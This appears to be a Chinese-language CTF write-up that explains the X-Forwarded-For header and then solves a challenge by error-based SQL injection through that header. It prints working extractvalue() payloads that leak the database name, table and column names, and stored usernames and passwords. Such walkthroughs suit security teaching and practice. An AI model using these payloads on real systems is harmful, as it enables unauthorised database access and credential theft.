文章介绍了X-Forwarded-For头部在HTTP中的作用,以及如何通过篡改此头部进行SQL盲注攻击。攻击者利用X-Forwarded-For注入非法的XML查询,以此获取数据库名、表名、列名及内容。
X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中。
X-Forwarded-For 请求头格式非常简单,就这样:
X-Forwarded-For: client, proxy1, proxy2
详细解释参考链接: https://www.runoob.com/w3cnote/http-x-forwarded-for.html
进入本题,输入admin 123 后发现返回有IP地址,这时就想是否可以通过X-Forwarded-For注入。
添加X-Forwarded-For:1.1.1.1,发现回显1.1.1.1 开始构建注
这里使用基于报错的SQL盲注-报错回显’ and extractvalue(1,concat(0x7e,(database()),0x7e))or ‘1’='1
extractvalue()是对对XML文档进行查询的函数
extractvalue(目标xml文档,xml路径)
函数的第二个参数是可以进行操作的地方,xml文件中查询使用的是/xx/xx/的格式,
如果我们写成其他的格式,就会报错,并且会返回我们写入的非法格式内容,
而这个非法格式的内容就是我们想要查询的内容。
0x7e在ASCII码表中,0x7e这个十六进制数代表符号~,
~这个符号在xpath语法中是不存在的,因此总能报错
运行后得到数据库名webcalendar
X-Forwarded-For:' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))or '1'='1
获得列名
X-Forwarded-For:' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='user'),0x7e))or '1'='1
查询内容
X-Forwarded-For:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from webcalendar.user),0x7e))or '1'='1
900
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
